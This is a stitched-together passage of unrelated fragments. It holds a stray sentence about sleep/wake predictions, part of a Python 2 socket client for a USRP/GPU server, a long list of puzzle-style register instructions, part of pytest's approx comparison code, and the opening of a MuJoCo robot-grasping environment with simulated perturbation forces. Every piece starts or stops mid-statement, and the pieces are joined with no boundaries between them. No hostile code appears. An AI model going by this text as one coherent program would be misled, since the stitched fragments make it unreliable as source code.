sleep/wake predictions in one minute epochs. Number of
port. - timeout: timeout in seconds to wait for connection. Known bugs: - On some linux distribution once on two attempts the connection is denied by software. On third attempt however it connects. Returns: - True: if connection was succesfull. - False if no connection was established. Examples: >>> if(USRP_socket_bind(USRP_data_socket, USRP_server_address_data, 5)): # do stuff with function in this library >>> else: >>> print "No connection, check hardware and configs." Notes: - This method will only connect one soket to the USRP/GPU server, not data and async messages. This function is intended to be used in higher level functions contained in this library. The correct methot for connecting to USRP/GPU server is the use of USERP_Connect(timeout) function. """ if timeout < 0: print_warning("No GPU server connection established after timeout.") return False else: try: USRP_socket.connect(server_address) return True except socket.error as msg: print(("Socket binding " + str(msg) + ", " + "Retrying...")) return False USRP_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) USRP_socket.settimeout(1) USRP_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) time.sleep(1) timeout = timeout - 1 return USRP_socket_bind(USRP_socket, server_address, timeout) def Decode_Sync_Header(raw_header, CLIENT_STATUS=CLIENT_STATUS): ''' Decode an async header containing the metadata of the packet. Return: - The metadata in dictionary form. Arguments: - The raww header as a string (as returned by the recv() method of socket). ''' def decode_frontend(code): return { 'A': "A_TXRX", 'B': "A_RX2", 'C': "B_TXRX", 'D': "B_RX2" }[code] try: header = np.fromstring(raw_header, dtype=header_type, count=1) metadata = {} metadata['usrp_number'] = header[0]['usrp_number'] metadata['front_end_code'] = decode_frontend(header[0]['front_end_code']) metadata['packet_number'] = header[0]['packet_number'] metadata['length'] = header[0]['length'] metadata['errors'] = header[0]['errors'] metadata['channels'] = header[0]['channels'] return metadata except ValueError: if CLIENT_STATUS["keyboard_disconnect"] == False: print_error("Received corrupted header. No recover method has been implemented.") return None def Print_Sync_Header(header): print "usrp_number" + str(header['usrp_number']) print "front_end_code" + str(header['front_end_code']) print "packet_number" + str(header['packet_number']) print "length" + str(header['length']) print "errors" + str(header['errors']) print "channels" + str(header['channels']) def Decode_Async_header(header): ''' Extract the length of an async message from the header of an async package incoming from the GPU server''' header = np.fromstring(header, dtype=np.int32, count=2) if header[0] == 0: return header[1] else: return 0 def Decode_Async_payload(message): ''' Decode asynchronous payloads coming from the GPU server ''' global ERROR_STATUS, END_OF_MEASURE, REMOTE_FILENAME, EOM_cond try: res = json.loads(message) except ValueError: print_warning("Cannot decode response from server.") return try: atype = res['type'] except KeyError: print_warning("Unexpected json string from the server: type") # print "FROM SERVER: "+str(res['payload']) if atype == 'ack': if res['payload'].find("EOM") != -1: print_debug("Async message from server: Measure finished") EOM_cond.acquire() END_OF_MEASURE = True EOM_cond.release() elif res['payload'].find("filename") != -1: REMOTE_FILENAME = res['payload'].split("\"")[1] else: print_debug("Ack message received from the server: " + str(res['payload'])) if atype == 'nack': print_warning("Server detected an error.") ERROR_STATUS = True EOM_cond.acquire() END_OF_MEASURE = True EOM_cond.release() def Encode_async_message(payload): ''' Format a JSON string so that the GPU server can read it. Arguments: - payload: A JSON string. Returns: - A formatted string ready to be sent via socket method Note: This function performs no check on the validity of the JSON string. ''' return struct.pack('I', 0) + struct.pack('I', len(payload)) + payload def Async_send(payload): ''' Send a JSON string to the GPU server. Typically the JSON string represent a command or a status request. Arguments: -payload: JSON formatted string. Returns: -Boolean value representing the success of the operation. Note: In order to use this function the Async_thread has to be up and running. See Start_Async_RX(). ''' global Async_condition global Async_status global USRP_socket if (Async_status): # send the data try: USRP_socket.send(Encode_async_message(payload)) except socket.error as err: print_warning("An async message could not be sent due to an error: " + str(err)) if err.errno == 32: print_error("Async server disconnected") Async_condition.acquire() Async_status = False Async_condition.release() return False return True else: print_warning("The Async RX thread is not running, cannot send Async message.") return False def Async_thread(): '''Receiver thread for async messages from the GPU server. This function is ment to be run as a thread''' global Async_condition global Async_status global USRP_socket global USRP_server_address internal_status = True Async_status = False # the header iscomposed by two ints: one is always 0 and the other represent the length of the payload header_size = 2 * 4 # just initialization of variables old_header_len = 0 old_data_len = 0 # try to connect, if it fails set internal status to False (close the thread) Async_condition.acquire() # if(not USRP_socket_bind(USRP_socket, USRP_server_address, 5)): time_elapsed = 0 timeout = 10 # sys.maxint data_timeout_wait = 0.01 connected = False while time_elapsed < timeout and (not connected): try: print_debug("Async command thread:") connected = USRP_socket_bind(USRP_socket, USRP_server_address, 7) time.sleep(1) time_elapsed += 1 except KeyboardInterrupt: print_warning("Keyboard interrupt aborting connection...") break if not connected: internal_status = False Async_status = False print_warning("Async data connection failed") Async_condition.release() else: Async_status = True print_debug("Async data connected") Async_condition.release() # acquisition loop while (internal_status): # counter used to prevent the API to get stuck on sevrer shutdown data_timeout_counter = 0 data_timeout_limit = 5 header_timeout_limit = 5 header_timeout_counter = 0 header_timeout_wait = 0.1 # lock the "mutex" for checking the state of the main API instance Async_condition.acquire() if Async_status == False: internal_status = False Async_condition.release() size = 0 if (internal_status): header_data = "" try: while (len(header_data) < header_size) and internal_status: header_timeout_counter += 1 header_data += USRP_socket.recv(min(header_size, header_size - len(header_data))) if old_header_len != len(header_data): header_timeout_counter = 0 if (header_timeout_counter > header_timeout_limit): time.sleep(header_timeout_wait) Async_condition.acquire() if Async_status == False: internal_status = False # print internal_status Async_condition.release() old_header_len = len(header_data) # general timer time.sleep(.1) if (internal_status): size = Decode_Async_header(header_data) except socket.error as msg: if msg.errno != None: print_error("Async header: " + str(msg)) Async_condition.acquire() internal_status = False Async_status = False Async_condition.release() if (internal_status and size > 0): data = "" try: while (len(data) < size) and internal_status: data_timeout_counter += 1 data += USRP_socket.recv(min(size, size - len(data))) if old_data_len != len(data): data_timeout_counter = 0 if (data_timeout_counter > data_timeout_limit): time.sleep(data_timeout_wait) Async_condition.acquire() if Async_status == False: internal_status = False Async_condition.release() old_data_len = len(data) if (internal_status): Decode_Async_payload(data) except socket.error as msg: if msg.errno == 4: pass # the ctrl-c exception is handled elsewhere elif msg.errno != None: print_error("Async thread: " + str(msg)) Async_condition.acquire() internal_status = False Async_status = False Async_condition.release() print_warning("Async connection is down: " + msg) USRP_socket.shutdown(1) USRP_socket.close() del USRP_socket gc.collect() Async_RX_loop = Thread(target=Async_thread, name="Async_RX", args=(), kwargs={}) Async_RX_loop.daemon = True def Wait_for_async_connection(timeout=None): ''' Block until async thead has established a connection with the server or the thread is expired. In case a timeout value is given, returns after timeout if no connection is established before. Arguments: - timeout: Second to wait for connection. Default is infinite timeout Return: - boolean representing the sucess of the operation. ''' global Async_condition global Async_status time_elapsed = 0 if timeout is None: timeout = sys.maxint try: while time_elapsed < timeout: Async_condition.acquire() x = Async_status Async_condition.release() time.sleep(1) if x: break else: time_elapsed += 1 except KeyboardInterrupt: print_warning("keyboard interrupt received. Closing connections.") return False return x def Wait_for_sync_connection(timeout=None): ''' Block until async thead has established a connection with the server or the thread is expired. In case a timeout value is given, returns after timeout if no connection is established before. Arguments: - timeout: Second to wait for connection. Default is infinite timeout Return: - boolean representing the sucess of the operation. ''' global Sync_RX_condition global CLIENT_STATUS time_elapsed = 0 x = False if timeout is None: timeout = sys.maxint try: while time_elapsed < timeout: Sync_RX_condition.acquire() x = CLIENT_STATUS['Sync_RX_status'] Sync_RX_condition.release() time.sleep(1) if x: break else: time_elapsed += 1 except KeyboardInterrupt: print_warning("keyboard interrupt received. Closing connections.") return False return x def Start_Async_RX(): '''Start the Aswync thread. See Async_thread() function for a more detailed explanation.''' global Async_RX_loop reinit_async_socket() try: Async_RX_loop.start() except RuntimeError: Async_RX_loop = Thread(target=Async_thread, name="Async_RX", args=(), kwargs={}) Async_RX_loop.daemon = True Async_RX_loop.start() # print "Async RX thread launched" def Stop_Async_RX(): '''Stop the Async thread. See Async_thread() function for a more detailed explanation.''' global Async_RX_loop, Async_condition, Async_status Async_condition.acquire() print_line("Closing Async RX thread...") Async_status = False Async_condition.release() Async_RX_loop.join() print_line("Async RX stopped") def Connect(timeout=None): ''' Connect both, the Syncronous and Asynchronous communication service. Returns: - True if both services are connected, False otherwise. Arguments: - the timeout in seconds.
== -1753 mmw inc -16 if t > 2911 eri dec 502 if um <= -785 hg inc 134 if x != -2775 lx dec 263 if kg <= 2978 hg dec 83 if es != -1235 mmw dec -837 if umr <= 693 dy inc 148 if um < -792 gk inc -13 if j > -247 x dec 749 if yk >= -568 lbf inc 606 if is != 2489 x inc 588 if dy >= 2345 dy dec 243 if yk <= -574 umr dec 1 if es == -1233 f dec 104 if t == 2903 aao dec 32 if es != -1224 x inc 882 if j < -245 hg inc -998 if uy == 890 dy dec -605 if dy <= 2115 hg inc 45 if gk != -1769 lbf inc -521 if t > 2894 umr inc -115 if a != 1473 lx dec -795 if x == -2194 t inc 143 if f < -1154 es dec 629 if is > 2494 lbf inc 195 if fk <= -263 fk inc 926 if aao <= -2153 um inc 351 if es != -1230 t dec -541 if lx != 316 mmw inc -329 if mmw != 4178 dy inc 708 if is > 2481 j inc 386 if t != 3050 hg dec 253 if umr == 568 um inc 236 if mmw >= 4172 fk inc -874 if hg != 1328 lbf dec -499 if um != -202 lbf dec 999 if gk > -1774 gk dec 474 if fk > -219 mmw dec -598 if yk > -585 fk inc -508 if t == 3046 mmw inc -638 if x == -2193 f dec 756 if a == 1477 mmw dec -339 if aao > -2161 um inc 109 if lbf <= -578 fk dec -421 if lx < 321 is inc -725 if ada >= -1226 fk dec -458 if ada >= -1226 uy dec -588 if aao <= -2160 ada inc 404 if dy != 3420 x inc 788 if f <= -1910 kg dec -520 if is == 1754 es dec 895 if lbf < -568 fk dec -999 if lbf == -578 kg dec -38 if lbf != -574 uy inc 343 if lbf != -579 is dec -176 if es <= -2125 lbf dec -680 if lbf < -573 eri inc 562 if uy != 1823 x inc 87 if fk >= 1158 umr dec -850 if eri > -1843 um inc -978 if eri <= -1849 x dec 389 if gk < -2241 f inc -288 if a != 1486 kg dec -484 if uy < 1826 lx dec -328 if lbf != 97 um inc -998 if gk <= -2240 yk inc 314 if mmw <= 5120 t dec -884 if es == -2128 uy dec 190 if f <= -2199 lx dec 128 if umr > 1425 eri inc 807 if a > 1485 ada inc 272 if umr < 1422 hg inc 630 if is == 1937 um dec 143 if ada >= -949 eri dec -334 if lx != 637 fk dec 147 if umr < 1426 gk dec 309 if uy == 1631 aao dec 233 if hg == 1336 is dec 825 if yk > -271 lbf dec -498 if umr <= 1413 kg dec 473 if es > -2131 mmw dec -728 if hg != 1327 dy dec 309 if hg <= 1341 dy inc -863 if kg >= 3023 x inc -465 if lx <= 647 a inc 253 if x >= -1793 kg inc -184 if eri < -1500 um inc -527 if lx != 652 j inc -455 if hg > 1328 eri inc 866 if yk != -263 aao inc -47 if gk > -2553 gk inc 228 if gk < -2554 gk inc -493 if fk <= 1006 mmw inc 800 if x == -1784 lbf inc -351 if umr < 1426 a inc -903 if ada > -958 umr inc 942 if es != -2128 dy inc 600 if a < 830 j dec -247 if lx < 646 gk dec -922 if t >= 3930 mmw inc -114 if lx != 654 fk dec 415 if um > -1764 t inc -763 if lbf < -246 ada inc 818 if is > 1108 uy inc -839 if t != 3171 fk inc -335 if is > 1106 fk dec -335 if yk == -263 fk inc -291 if dy == 3711 lx dec -665 if yk != -263 es dec -772 if uy != 792 umr dec -528 if um != -1764 t dec -95 if es < -2137 es inc -800 if yk >= -261 kg inc 150 if j >= -70 f dec -118 if mmw < 6536 a inc 595 if uy > 794 is inc 927 if lx > 636 eri dec -61 if x != -1785 hg inc -878 if yk != -260 gk inc -727 if fk <= 305 mmw dec -945 if a <= 833 aao inc -101 if x >= -1792 hg dec 567 if es > -2131 gk inc -689 if mmw < 7484 ada inc -644 if eri > -1452 yk inc -810 if yk > -265 um dec 655 if aao < -2533 t dec 179 if umr != 1943 gk inc 833 if hg >= -110 fk dec 998 if fk < 315 a dec -558 if aao > -2543 x inc 426 if lbf == -249 uy inc 892 if yk > -1075 umr inc 250 if es <= -2127 mmw inc -727 if umr >= 2193 kg dec 111 if es == -2128 dy dec 898 if fk != -693 yk dec 168 if umr >= 2191 uy dec 113 if dy <= 3711 mmw inc -752 if yk == -1241 yk inc -181 if t > 2989 mmw dec -636 if t < 2995 a inc -424 if hg == -109 j dec -762 if ada > -780 lx dec 565 if uy <= 1577 aao dec 858 if j == 697 fk inc -383 if a < 969 eri inc -51 if lx <= 85 aao inc 666 if j > 690 t dec 234 if a == 964 aao inc -69 if fk > -1085 es inc -721 if gk >= -2215 is inc -185 if lbf > -251 mmw dec 411 if es == -2849 f dec -214 if gk == -2210 yk inc 904 if aao >= -2804 es inc 883 if mmw != 6210 x dec 6 if ada != -774 aao inc -776 if um != -2419 j inc -653 if yk == -344 gk dec 338 if fk != -1072 yk inc -13 if x >= -1360 lbf inc 201 if dy < 3716 yk dec -904 if aao != -3575 f dec 922 if j == 697 uy dec -562 if lbf != -53 gk dec 50 if lbf <= -47 t inc -670 if mmw > 6222 lx inc 515 if uy == 2133 yk inc 261 if dy > 3704 x dec -854 if uy == 2133 kg inc 66 if umr == 2196 kg dec -83 if j != 706 ada inc 739 if gk > -2590 eri dec 379 if eri == -1497 dy inc 638 if aao >= -3583 a dec 130 if is > 1851 mmw dec 399 if uy == 2133 eri inc -195 if f > -2801 j dec 885 if dy > 4339 eri inc -544 if aao == -3587 kg inc 895 if t != 2984 yk inc 258 if dy <= 4350 es dec 660 if dy == 4342 umr inc -92 if gk < -2592 eri inc 361 if x == -504 um dec -298 if gk != -2588 fk dec 532 if j < -184 uy inc 31 if f < -2791 aao dec 31 if j != -182 ada inc 448 if um <= -2113 fk inc -13 if eri <= -1703 t inc -59 if es >= -1971 gk dec -909 if x == -510 es inc 805 if hg >= -112 j dec 734 if kg >= 3919 um inc 369 if aao != -3606 yk inc -548 if dy > 4348 gk inc 934 if j < -182 x dec 346 if hg <= -107 lbf dec -379 if eri != -1718 lbf inc -921 if f >= -2802 mmw inc -191 if eri <= -1703 umr inc 252 if lx != 600 mmw dec 410 if ada >= -330 gk inc 558 if a != 828 mmw dec 320 if um <= -1744 ada dec 517 if t < 2933 is dec -616 if ada > -835 yk dec -406 if j <= -185 yk inc -526 if lbf <= -586 ada inc 368 if j == -188 kg inc -89 if f <= -2791 kg dec -531 if lbf == -590 mmw
<reponame>albertvillanova/pytest<gh_stars>0 import math import pprint from collections.abc import Iterable from collections.abc import Mapping from collections.abc import Sized from decimal import Decimal from numbers import Complex from types import TracebackType from typing import Any from typing import Callable from typing import cast from typing import Generic from typing import Optional from typing import overload from typing import Pattern from typing import Tuple from typing import Type from typing import TypeVar from typing import Union import _pytest._code from _pytest.compat import final from _pytest.compat import STRING_TYPES from _pytest.outcomes import fail def _non_numeric_type_error(value, at: Optional[str]) -> TypeError: at_str = " at {}".format(at) if at else "" return TypeError( "cannot make approximate comparisons to non-numeric values: {!r} {}".format( value, at_str ) ) # builtin pytest.approx helper class ApproxBase: """Provide shared utilities for making approximate comparisons between numbers or sequences of numbers.""" # Tell numpy to use our `__eq__` operator instead of its. __array_ufunc__ = None __array_priority__ = 100 def __init__(self, expected, rel=None, abs=None, nan_ok: bool = False) -> None: __tracebackhide__ = True self.expected = expected self.abs = abs self.rel = rel self.nan_ok = nan_ok self._check_type() def __repr__(self) -> str: raise NotImplementedError def __eq__(self, actual) -> bool: return all( a == self._approx_scalar(x) for a, x in self._yield_comparisons(actual) ) # Ignore type because of https://github.com/python/mypy/issues/4266. __hash__ = None # type: ignore def __ne__(self, actual) -> bool: return not (actual == self) def _approx_scalar(self, x) -> "ApproxScalar": return ApproxScalar(x, rel=self.rel, abs=self.abs, nan_ok=self.nan_ok) def _yield_comparisons(self, actual): """Yield all the pairs of numbers to be compared. This is used to implement the `__eq__` method. """ raise NotImplementedError def _check_type(self) -> None: """Raise a TypeError if the expected value is not a valid type.""" # This is only a concern if the expected value is a sequence. In every # other case, the approx() function ensures that the expected value has # a numeric type. For this reason, the default is to do nothing. The # classes that deal with sequences should reimplement this method to # raise if there are any non-numeric elements in the sequence. pass def _recursive_list_map(f, x): if isinstance(x, list): return list(_recursive_list_map(f, xi) for xi in x) else: return f(x) class ApproxNumpy(ApproxBase): """Perform approximate comparisons where the expected value is numpy array.""" def __repr__(self) -> str: list_scalars = _recursive_list_map(self._approx_scalar, self.expected.tolist()) return "approx({!r})".format(list_scalars) def __eq__(self, actual) -> bool: import numpy as np # self.expected is supposed to always be an array here. if not np.isscalar(actual): try: actual = np.asarray(actual) except Exception as e: raise TypeError( "cannot compare '{}' to numpy.ndarray".format(actual) ) from e if not np.isscalar(actual) and actual.shape != self.expected.shape: return False return ApproxBase.__eq__(self, actual) def _yield_comparisons(self, actual): import numpy as np # `actual` can either be a numpy array or a scalar, it is treated in # `__eq__` before being passed to `ApproxBase.__eq__`, which is the # only method that calls this one. if np.isscalar(actual): for i in np.ndindex(self.expected.shape): yield actual, self.expected[i].item() else: for i in np.ndindex(self.expected.shape): yield actual[i].item(), self.expected[i].item() class ApproxMapping(ApproxBase): """Perform approximate comparisons where the expected value is a mapping with numeric values (the keys can be anything).""" def __repr__(self) -> str: return "approx({!r})".format( {k: self._approx_scalar(v) for k, v in self.expected.items()} ) def __eq__(self, actual) -> bool: try: if set(actual.keys()) != set(self.expected.keys()): return False except AttributeError: return False return ApproxBase.__eq__(self, actual) def _yield_comparisons(self, actual): for k in self.expected.keys(): yield actual[k], self.expected[k] def _check_type(self) -> None: __tracebackhide__ = True for key, value in self.expected.items(): if isinstance(value, type(self.expected)): msg = "pytest.approx() does not support nested dictionaries: key={!r} value={!r}\n full mapping={}" raise TypeError(msg.format(key, value, pprint.pformat(self.expected))) class ApproxSequencelike(ApproxBase): """Perform approximate comparisons where the expected value is a sequence of numbers.""" def __repr__(self) -> str: seq_type = type(self.expected) if seq_type not in (tuple, list, set): seq_type = list return "approx({!r})".format( seq_type(self._approx_scalar(x) for x in self.expected) ) def __eq__(self, actual) -> bool: try: if len(actual) != len(self.expected): return False except TypeError: return False return ApproxBase.__eq__(self, actual) def _yield_comparisons(self, actual): return zip(actual, self.expected) def _check_type(self) -> None: __tracebackhide__ = True for index, x in enumerate(self.expected): if isinstance(x, type(self.expected)): msg = "pytest.approx() does not support nested data structures: {!r} at index {}\n full sequence: {}" raise TypeError(msg.format(x, index, pprint.pformat(self.expected))) class ApproxScalar(ApproxBase): """Perform approximate comparisons where the expected value is a single number.""" # Using Real should be better than this Union, but not possible yet: # https://github.com/python/typeshed/pull/3108 DEFAULT_ABSOLUTE_TOLERANCE = 1e-12 # type: Union[float, Decimal] DEFAULT_RELATIVE_TOLERANCE = 1e-6 # type: Union[float, Decimal] def __repr__(self) -> str: """Return a string communicating both the expected value and the tolerance for the comparison being made. For example, ``1.0 ± 1e-6``, ``(3+4j) ± 5e-6 ∠ ±180°``. """ # Don't show a tolerance for values that aren't compared using # tolerances, i.e. non-numerics and infinities. Need to call abs to # handle complex numbers, e.g. (inf + 1j). if (not isinstance(self.expected, (Complex, Decimal))) or math.isinf( abs(self.expected) ): return str(self.expected) # If a sensible tolerance can't be calculated, self.tolerance will # raise a ValueError. In this case, display '???'. try: vetted_tolerance = "{:.1e}".format(self.tolerance) if ( isinstance(self.expected, Complex) and self.expected.imag and not math.isinf(self.tolerance) ): vetted_tolerance += " ∠ ±180°" except ValueError: vetted_tolerance = "???" return "{} ± {}".format(self.expected, vetted_tolerance) def __eq__(self, actual) -> bool: """Return whether the given value is equal to the expected value within the pre-specified tolerance.""" if _is_numpy_array(actual): # Call ``__eq__()`` manually to prevent infinite-recursion with # numpy<1.13. See #3748. return all(self.__eq__(a) for a in actual.flat) # Short-circuit exact equality. if actual == self.expected: return True # If either type is non-numeric, fall back to strict equality. # NB: we need Complex, rather than just Number, to ensure that __abs__, # __sub__, and __float__ are defined. if not ( isinstance(self.expected, (Complex, Decimal)) and isinstance(actual, (Complex, Decimal)) ): return False # Allow the user to control whether NaNs are considered equal to each # other or not. The abs() calls are for compatibility with complex # numbers. if math.isnan(abs(self.expected)): return self.nan_ok and math.isnan(abs(actual)) # Infinity shouldn't be approximately equal to anything but itself, but # if there's a relative tolerance, it will be infinite and infinity # will seem approximately equal to everything. The equal-to-itself # case would have been short circuited above, so here we can just # return false if the expected value is infinite. The abs() call is # for compatibility with complex numbers. if math.isinf(abs(self.expected)): return False # Return true if the two numbers are within the tolerance. result = abs(self.expected - actual) <= self.tolerance # type: bool return result # Ignore type because of https://github.com/python/mypy/issues/4266. __hash__ = None # type: ignore @property def tolerance(self): """Return the tolerance for the comparison. This could be either an absolute tolerance or a relative tolerance, depending on what the user specified or which would be larger. """ def set_default(x, default): return x if x is not None else default # Figure out what the absolute tolerance should be. ``self.abs`` is # either None or a value specified by the user. absolute_tolerance = set_default(self.abs, self.DEFAULT_ABSOLUTE_TOLERANCE) if absolute_tolerance < 0: raise ValueError( "absolute tolerance can't be negative: {}".format(absolute_tolerance) ) if math.isnan(absolute_tolerance): raise ValueError("absolute tolerance can't be NaN.") # If the user specified an absolute tolerance but not a relative one, # just return the absolute tolerance. if self.rel is None: if self.abs is not None: return absolute_tolerance # Figure out what the relative tolerance should be. ``self.rel`` is # either None or a value specified by the user. This is done after # we've made sure the user didn't ask for an absolute tolerance only, # because we don't want to raise errors about the relative tolerance if # we aren't even going to use it. relative_tolerance = set_default( self.rel, self.DEFAULT_RELATIVE_TOLERANCE ) * abs(self.expected) if relative_tolerance < 0: raise ValueError( "relative tolerance can't be negative: {}".format(absolute_tolerance) ) if math.isnan(relative_tolerance): raise ValueError("relative tolerance can't be NaN.") # Return the larger of the relative and absolute tolerances. return max(relative_tolerance, absolute_tolerance) class ApproxDecimal(ApproxScalar): """Perform approximate comparisons where the expected value is a Decimal.""" DEFAULT_ABSOLUTE_TOLERANCE = Decimal("1e-12") DEFAULT_RELATIVE_TOLERANCE = Decimal("1e-6") def approx(expected, rel=None, abs=None, nan_ok: bool =
from collections import OrderedDict from mujoco_py import MjSim, MjViewer from mujoco_py import load_model_from_xml, load_model_from_path import mujoco_py.cymj as cymj from mujoco_py.generated import const from mujoco_py import functions from grasp.utils import MujocoPyRenderer from grasp.controllers import inverse_kinematics from grasp.utils.mjcf_utils import xml_path_completion from grasp.utils.mjcf_utils import image_path_completion from grasp.utils.mjcf_utils import log_path_completion from grasp.utils.mjcf_utils import human_path_completion from grasp.utils.mjcf_utils import model_path_completion from grasp.utils.mjcf_utils import loss_path_completion from grasp.utils.mjcf_utils import config_path_completion from grasp.utils.mjcf_utils import preprocess from grasp.utils.mjcf_utils import rotateImageAndExtractPatch from grasp.predict_module import predict_from_img from grasp.predict_module.predict_API import predict_from_R_table from grasp.predict_module import init_detector from grasp.predict_module.predict_API import init_detector_test from grasp.predict_module.predict_API import init_detector_test_use_filter from grasp.predict_module.predict_API import init_detector_with_filter from grasp.predict_module.predict_API import drawRectangle_spot_on_centre from grasp.predict_module import build_network from grasp.predict_module import train_adv from grasp.predict_module import prepare_X_batch from grasp.predict_module import prepare_X_batch2 # debug from grasp.predict_module import adv_predict_from_img from grasp.predict_module import init_adv from grasp.predict_module.predict_API import init_force_filter2 import os import time import math import numpy as np import imageio import imutils from termcolor import colored import random from time import gmtime, strftime import xml.etree.ElementTree as ET import glfw import shutil import gc import copy from time import sleep import ipdb import ast REGISTERED_ENVS = {} def register_env(target_class): REGISTERED_ENVS[target_class.__name__] = target_class ''' will call init -> base.reset_internal() -> load_model ''' def make(env_name, *args, **kwargs): if env_name not in REGISTERED_ENVS: raise Exception( "Environment {} not found. Make sure it is a registered environment among: {}".format( env_name, ", ".join(REGISTERED_ENVS) ) ) print('Registered_ENV: {}'.format(REGISTERED_ENVS)) return REGISTERED_ENVS[env_name](*args, **kwargs) class EnvMeta(type): def __new__(meta, name, base, class_dict): cls = super().__new__(meta, name, base, class_dict) _unregistered_envs = ['MujocoEnv','SawyerEnv'] if cls.__name__ not in _unregistered_envs: register_env(cls) return cls class MujocoEnv(metaclass = EnvMeta): def __init__( self, has_renderer=True, has_offscreen_renderer=False, render_collision_mesh=True, render_visual_mesh=True, control_freq=10, horizon=1000, ignore_done=False, use_camera_obs=False, camera_name="frontview", camera_height=256, camera_width=256, camera_depth=False, use_render = True, log_name = '1', use_new_model = 'False', use_pro_new='False', to_train ='False', is_human ='False', train_pro='False', adv_init=False, random_perturb=False, use_pro_name='', use_new_name='', object_xml='', user_name='', seed =48, params =None, test_user = False, is_test=False, use_filter=False, option=0 ): self.has_renderer = True self.has_offscreen_renderer = has_offscreen_renderer self.render_collision_mesh = render_collision_mesh self.render_visual_mesh = render_visual_mesh self.control_freq = control_freq self.horizon = horizon self.ignore_done = ignore_done self.viewer = None self.model = None self.use_new_name=use_new_name self.use_pro_name = use_pro_name self.user_name = user_name self.params = params self.begin_time = strftime("%Y-%m-%d %H:%M:%S", gmtime()) #random init of object size, location and orientation if object_xml =='all.xml': self.random_init= True else: self.random_init = False self.object_xml = object_xml print('model used: {}'.format(self.object_xml)) # settings for camera observations self.use_camera_obs = use_camera_obs if self.use_camera_obs and not self.has_offscreen_renderer: raise ValueError("Camera observations require an offscreen renderer.") self.camera_name = camera_name if self.use_camera_obs and self.camera_name is None: raise ValueError("Must specify camera name when using camera obs") self.camera_height = camera_height self.camera_width = camera_width self.camera_depth = camera_depth # required by stable_baselines monitor self.metadata = {'render.modes': []} self.reward_range = (-float('inf'), float('inf')) self.spec = None self.speed = 1. self.pert = 1 self._reset_internal() #initialize detector only once self.num_samples = 128 self.num_samples_spot = 17#17 self.batch_update = 2 self.train_batch_update= 4 #7 self.record_state_force_filter = [] print(colored('initialize protagonist detection model', 'red')) self.lr_rate = 0.0001 #0.001 #self.random_init = True ### test script self.adv_start_idx = 100 self.is_valid_sample = True self.use_force_filter = use_filter#False self.is_test = is_test#False self.contained_curriculum = None self.contained_curriculum_test = None self.option = option self.empty_num = 0 self.lift_success = False self.failed_cases_stack1 = [] self.failed_cases_stack2 = [] self.max_steps = 0 self.R_table_update_info = None self.is_force_classify_test = False self.num_help_samples = 0 self.num_adv_samples = 0 self.default_filtering = True self.patch_Is_resized_vec2=[] self.y_train_vec2=[] self.fc8_predictions_vec2=[] self.pro_save_num2 = 1 if not self.random_init: if self.object_xml =='half-nut.xml' : self.lr_rate = 0.0001#0.00001 if self.object_xml=='round-nut.xml': self.lr = 0.005 self.G = None self.G_filter = None self.G_force = None if not is_test: if use_filter: self.G = init_detector_with_filter(self.num_samples, use_pro_new, use_pro_name, self.num_samples, gpu_id=0, lr_rate=self.lr_rate, test_user=test_user) self.G_filter = init_detector(self.num_samples, use_pro_new, use_pro_name, self.num_samples, gpu_id=0, lr_rate=self.lr_rate, test_user=test_user) else: self.G = init_detector(self.num_samples, use_pro_new, use_pro_name, self.num_samples, gpu_id=0, lr_rate=self.lr_rate, test_user=test_user) self.G_filter = init_detector_with_filter(self.num_samples, use_pro_new, use_pro_name, self.num_samples, gpu_id=0, lr_rate=self.lr_rate, test_user=test_user) elif use_filter: self.G = init_detector_test_use_filter(self.num_samples, use_pro_new, use_pro_name, self.num_samples, gpu_id=0, lr_rate=self.lr_rate, test_user=test_user, option=self.option) elif not use_filter: self.G = init_detector_test(self.num_samples, use_pro_new, use_pro_name, self.num_samples, gpu_id=0, lr_rate=self.lr_rate, test_user=test_user, option=self.option) self.is_once_created_R_table = False self.is_once_created_R_table2 = False self.is_once_created_filter = False self.center_pt = None self.R_table = None self.R_table2 = None #self.F_table = None self.crop_h_ = None self.crop_w_ = None self.min_coord = None self.range_ = None self.training_R_table_ground_truth = False self.count_to_100 = 0 self.current_coord_offset_X = 0#200#60#270 self.current_coord_offset_Y = 0 self.post_reward_list = [] self.stop_training = False self.post_reward = 1 self.force_type = None self.save_R_table_purterbed = False self.save_R_table_Up = False self.thold_start_using_filter = 25 # 25 self.force_type_inst = False # the first means no force is applied # object to use force = 3.5 if not self.random_init: force = 3.5 if self.object_xml=='bottle.xml': force= 3.5 if self.object_xml=='bread.xml': force=3 if self.object_xml=='new_cube.xml': force=3.0 if self.object_xml=='round-nut.xml': force=6 #later changed to 4 if self.object_xml =='half-nut.xml': force = 5.5 if self.object_xml =='cube.xml': force = 1.5 down_force = 0.3 if not self.random_init: down_force = 1 if self.object_xml == 'cube.xml': down_force = 0.3 if self.object_xml == 'new_cube.xml': down_force = 0.5 if self.object_xml =='half-nut.xml': down_force= 0.3 print(colored('obejct_xml: {}, force: {}, down_force: {}'.format(self.object_xml, force, down_force),'red')) self.is_human = is_human if self.is_human: self.adv_forces = np.array([[0, 0, 0, 0, 0, 0],[-force, 0, 0, 0, 0, 0], [0, -force, 0, 0, 0, 0], [force ,0, 0, 0, 0, 0], [0, force, 0, 0, 0, 0], [0, 0, force, 0, 0, 0], [0, 0, -down_force, 0, 0, 0]]) self.idx_to_action = {0: 'nothing', 1: 'left', 2: 'outward', 3: 'right', 4: 'inside', 5: 'up', 6:'down'} else: self.adv_forces = np.array([[-force, 0, 0, 0, 0, 0] , [0 , 0, -down_force, 0, 0, 0], [0, -force, 0, 0, 0, 0], [force ,0, 0, 0, 0, 0], [0, force, 0, 0, 0, 0], [0, 0, force, 0, 0, 0]]) # self.adv_forces = np.array([[0, -force, 0, 0, 0, 0]]) self.idx_to_action = {0:'left', 1: 'down', 2:'outward', 3:'right', 4:'inside', 5:'up'} # self.idx_to_action = {0:'outward'} self.n_adv_outputs = len(self.adv_forces) self.log_name = log_name # init adv policy, get sess self.adv_init=adv_init self.G_adv = None if not self.is_human and self.adv_init: print(colored('initialize adversarial detection model', 'blue')) # self.adv_policy = build_network(outputs=self.n_adv_outputs, use_new_model=use_new_model, use_new_name=self.use_new_name, log_name=self.log_name, gpu_id=3) self.G_adv = init_adv(self.num_samples, use_new_model, use_new_name, self.num_samples, gpu_id=0, adv_lr_rate =0.001) #self.G_force = init_force_filter(batch_size=1, gpu_id=0, lr_rate=0.01, Collective_dimension=2323) self.fc8_norms = None 